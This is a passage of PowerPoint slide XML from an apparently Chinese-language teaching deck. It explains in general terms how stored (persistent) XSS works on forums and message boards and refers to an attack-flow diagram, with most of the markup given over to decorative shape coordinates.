                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>将恶意代码嵌入数据库或文件等持久化存储介质中。这种攻击常见于留言板等交互区域，攻击者在留言时将恶意代码存入数据库。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>存储型XSS的成因与反射型XSS相似，但关键在于恶意代码被保存在服务器上，使得任何访问该资源的用户都可能触发执行。这种攻击具有高隐蔽性，因为攻击脚本永久存在于服务器的数据库或文件中。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>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rPr>
              <a:t>攻击方式多见于论坛、博客和留言板，攻击者在发帖时注入恶意脚本。一旦帖子被存储，恶意脚本也随之永久存储在服务器上。当其他用户浏览这些帖子时，恶意脚本便在他们的浏览器中执行，给用户带来安全风险。所以需要浏览器从服务器载入恶意的xss代码，才能真正触发xss。</a:t>
            </a:r>
            <a:endParaRPr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7" name="TextBox 7"/>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XSS的分类</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1201420"/>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2.存储型XSS（持久型）</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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="1676400"/>
            <a:ext cx="10400030" cy="553085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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rPr>
              <a:t>攻击流程如图10-2 所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 2" descr="2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="2286000"/>
            <a:ext cx="4626610" cy="3491230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="5943600"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-2 存储型XSS攻击流程图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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8877300" y="5857875"/>
            <a:ext cx="3314700" cy="1000125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3314700" h="1000125">
                <a:moveTo>
                  <a:pt x="3314700" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1000125" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="951670" y="1153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903811" y="4578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856598" y="10222"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="810086" y="18033"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="764326" y="27959"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719370" y="39946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="675271" y="53944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="632081" y="69898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589853" y="87758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="107470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508492" y="128982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="469464" y="152243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="431607" y="177198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394974" y="203797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="359617" y="231986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325588" y="261713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="292941" y="292926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="261727" y="325573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231998" y="359601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203808" y="394957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177208" y="431590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152252" y="469446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128991" y="508475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107477" y="548622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87764" y="589836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69903" y="632064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53947" y="675255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39949" y="719355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27961" y="764312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18034" y="810074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10223" y="856588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4578" y="903803"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1153" y="951665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1000122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700" y="1000124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3314700"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3" name="Freeform 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9186926" y="5424551"/>
            <a:ext cx="3005455" cy="1433830"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3005454" h="1433829">
                <a:moveTo>
                  <a:pt x="120209" y="1433448"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="89849" y="1374297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="1332494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="1289692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="1245945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="1201308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="1155837"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="1109588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="1062616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="1014976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="966724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="918471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4695" y="870831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10481" y="823859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18486" y="777611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28654" y="732142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40930" y="687507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55258" y="643761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71583" y="600960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89849" y="559160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="110002" y="518416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="131985" y="478782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="155744" y="440315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181223" y="403070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208367" y="367101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="237120" y="332466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267427" y="299218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299233" y="267413"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="332481" y="237107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="367117" y="208355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="403086" y="181213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="440332" y="155735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478799" y="131977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="518432" y="109995"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="559177" y="89843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600976" y="71577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="643776" y="55254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687520" y="40926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="732154" y="28652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777622" y="18485"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="823868" y="10480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="870837" y="4695"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="918474" y="1182"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="966724" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3005074" y="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 name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110680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 name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090612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 name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107346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 name="Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105727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 name="Freeform 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10429875" y="5648325"/>
            <a:ext cx="19050" cy="419100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19050" h="419100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="419100"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="381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9" name="Freeform 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="102393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0" name="Freeform 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="2908195"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="0" y="1092304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="949" y="1044230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="996637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="949562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="903040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="857107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="811799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="767150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="723198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="679978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="637525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="595875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="555064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="515128"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="476102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="438022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="400924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="364843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="329815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="295876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="263062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="231408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="200950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="171723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="143764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="117109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="91792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="67849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="45317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="658083" y="24231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698894" y="4626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="709549"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1" name="Freeform 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11482451" y="4000500"/>
            <a:ext cx="709930" cy="1092835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="709929" h="1092835">
                <a:moveTo>
                  <a:pt x="709549" y="1092410"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="658083" y="1068174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="618147" y="1047084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="579121" y="1024547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="541041" y="1000601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="503943" y="975279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467862" y="948619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="432834" y="920655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="398895" y="891425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366081" y="860962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334427" y="829303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="303969" y="796484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274743" y="762541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246784" y="727508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220128" y="691423"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194811" y="654320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170868" y="616236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148336" y="577206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="127250" y="537266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107645" y="496451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89558" y="454798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73024" y="412342"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58079" y="369118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="44758" y="325163"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33098" y="280513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23133" y="235202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14900" y="189267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8435" y="142744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772" y="95667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="949" y="4807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2" name="Freeform 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11528170" y="3067176"/>
            <a:ext cx="388620" cy="439420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="388620" h="439420">
                <a:moveTo>
                  <a:pt x="388620" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="204470"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="373125" y="438912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38862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3" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1085850" cy="3133725"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="85725" y="3133724"/>
                </a:moveTo>
                <a:close/>
              </a:path>
              <a:path w="1085850" h="3133725">
                <a:moveTo>
                  <a:pt x="1085850" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3129904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37270" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85725" y="3133724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134179" y="3132571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182040" y="3129146"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229254" y="3123501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="275768" y="3115690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321530" y="3105763"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="366487" y="3093775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410587" y="3079777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="453777" y="3063821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="496006" y="3045960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537220" y="3026247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="577367" y="3004733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="616396" y="2981472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="654252" y="2956516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690885" y="2929916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="726242" y="2901726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760270" y="2871997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="792917" y="2840783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="824131" y="2808136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="853859" y="2774107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="882048" y="2738750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908647" y="2702117"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="933603" y="2664260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="956864" y="2625232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="978376" y="2585085"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998089" y="2543871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1015949" y="2501643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1031904" y="2458453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1045902" y="2414354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1057890" y="2369398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1067816" y="2323638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075627" y="2277126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1081271" y="2229913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084696" y="2182054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085850" y="2133600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108585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4" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553260" y="0"/>
            <a:ext cx="2360930" cy="1081405"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2360930" h="1081405">
                <a:moveTo>
                  <a:pt x="2360640" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2351430" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2343262" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2333376" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2321806" y="210863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2308590" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2293762" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2277358" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259412" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2239961" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2219041" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2196685" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2172931" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2147812" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2121366" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2093626" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2064629" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2034410" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2003005" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1970448" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1936776" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1902023" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1866226" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1829419" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1791639" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752919" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1713297" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1672807" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1631485" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1589366" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1546486" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1502880" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1458583" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1413632" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1368061" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1321905" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1275201" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1227984" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1180289" y="1081151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1132593" y="1080201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1085376" y="1077377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1038673" y="1072713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="992518" y="1066246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="946948" y="1058012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901997" y="1048045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="857702" y="1036382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="814097" y="1023058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="771219" y="1008110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="729101" y="991573"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="687781" y="973482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647293" y="953874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607673" y="932784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="568956" y="910247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="531177" y="886301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494372" y="860979"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="458577" y="834319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423827" y="806355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390157" y="777125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357603" y="746662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="326200" y="715003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="295983" y="682184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266988" y="648241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239251" y="613208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212807" y="577123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187691" y="540020"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163938" y="501936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141585" y="462906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120666" y="422966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101217" y="382151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83273" y="340498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66871" y="298042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52044" y="254818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38829" y="210863"/>
                </a:lnTo>
